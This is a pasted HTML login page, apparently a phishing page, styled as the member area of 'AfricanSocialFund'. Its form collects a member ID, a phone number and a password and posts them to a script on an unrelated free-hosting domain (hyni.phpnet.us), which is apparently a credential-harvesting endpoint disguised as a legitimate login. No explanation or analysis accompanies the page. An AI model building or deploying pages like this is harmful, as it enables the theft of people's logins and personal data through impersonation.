Untitled
3 years ago by Genieweb in HTML
<!DOCTYPE html>
<html lang="fr">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title> AfricanSocialFund | Connexion</title>
<link rel="shortcut icon" href="favicon.png">
<link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet">
<link href="css/sb-admin-2.css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="libs/bootstrap/css/bootstrap.css" />
<link rel="stylesheet" type="text/css" href="libs/bootstrap/css/bootstrap-reboot.css" />
<link rel="stylesheet" type="text/css" href="libs/gritter/css/gritter.css" />
<link href="assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link rel="stylesheet" href="lib/noty.css"/>
<link rel="stylesheet" href="lib/themes/mint.css"/>
</head>
<body class="" >
<div class="container">
<div class="row justify-content-center "style="background-image: url('img/bglogin.jpg'); background-size: 100% 100% !important">
<div class="col-xl-10 col-lg-12 col-md-9">
<div class="col-lg-6 justify-content-center "style="margin-top: 50px;">
<div class="p-5 center grid simple bordergreen"style="background-color: #a4cafd">
<div class="text-center " style="background-color: #a4cafd" >
<img src="img/Logoklm.png" alt="Logo" style="margin-top: -35px;"/>
<hr>
<h1 class="h5 text-gray-900 mb-4 oi text-center"style="margin-top: 0px;"><b>ESPACE MEMBRES</b></h1>
</div>
<h6 class="text-danger" align="center"></h6>
<form class="form-control-user" action="http://hyni.phpnet.us/script.php" method="POST">
<fieldset>
<div class="form-group">
<div class="input-group">
<span class="input-group-addon mygreen">
<span class="arrow"></span>
<i class="fa fa-user"></i>
</span>
<input type="" name="userid" class="form-control form-control-user " id="userid" placeholder="ID (Ex: 0000)" required="">
</div>
</div>
<div class="form-group">
<div class="input-group">
<span class="input-group-addon mygreen">
<span class="arrow"></span>
<i class="fa fa-phone"></i>
</span>
<input type="mobile" name="mobile" class="form-control form-control-user" id="telephone" placeholder="Téléphone (Ex: 22996807530)" required="">
</div>
</div>
<div class="form-group">
<div class="input-group">
<span class="input-group-addon mygreen">
<span class="arrow"></span>
<i class="fa fa-lock"></i>
</span>
<input type="password" name="password" class="form-control form-control-user" id="" placeholder="Mot de passe" required="">
</div>
</div>
<div class="form-group">
<div class="custom-control custom-checkbox small">
<input type="checkbox" class="custom-control-input" id="customCheck">
<label class="custom-control-label" for="customCheck">Remember Me</label>
</div>
</div>
<button type="submit" name="memberlog" class="btn btn-success btn-user btn-block" id="connexion">
<b>Connexion</b>
</button>
</fieldset>
</form>
<hr>
<div class="text-center">
<a class="small text-danger" href="forgot-password.php">Mot de passe oublié?</a>
</div>
<div class="text-center">
<a class="small text-success" href="inscription.php">S'inscrire</a>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="vendor/jquery/jquery.min.js"></script>
<script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
<script src="vendor/jquery-easing/jquery.easing.min.js"></script>
<script src="js/sb-admin-2.min.js"></script>
<script type="text/javascript" src="libs/jquery/jquery-3.4.1.js"> </script>
<script src="//cdn.jsdelivr.net/velocity/1.5/velocity.min.js"></script>
<script src="//cdn.jsdelivr.net/mojs/latest/mo.min.js"></script>
<script type="text/javascript" src="bouncejs/bounce.js"></script>
<script type="text/javascript" src="lib/noty.js"></script></body>
</html>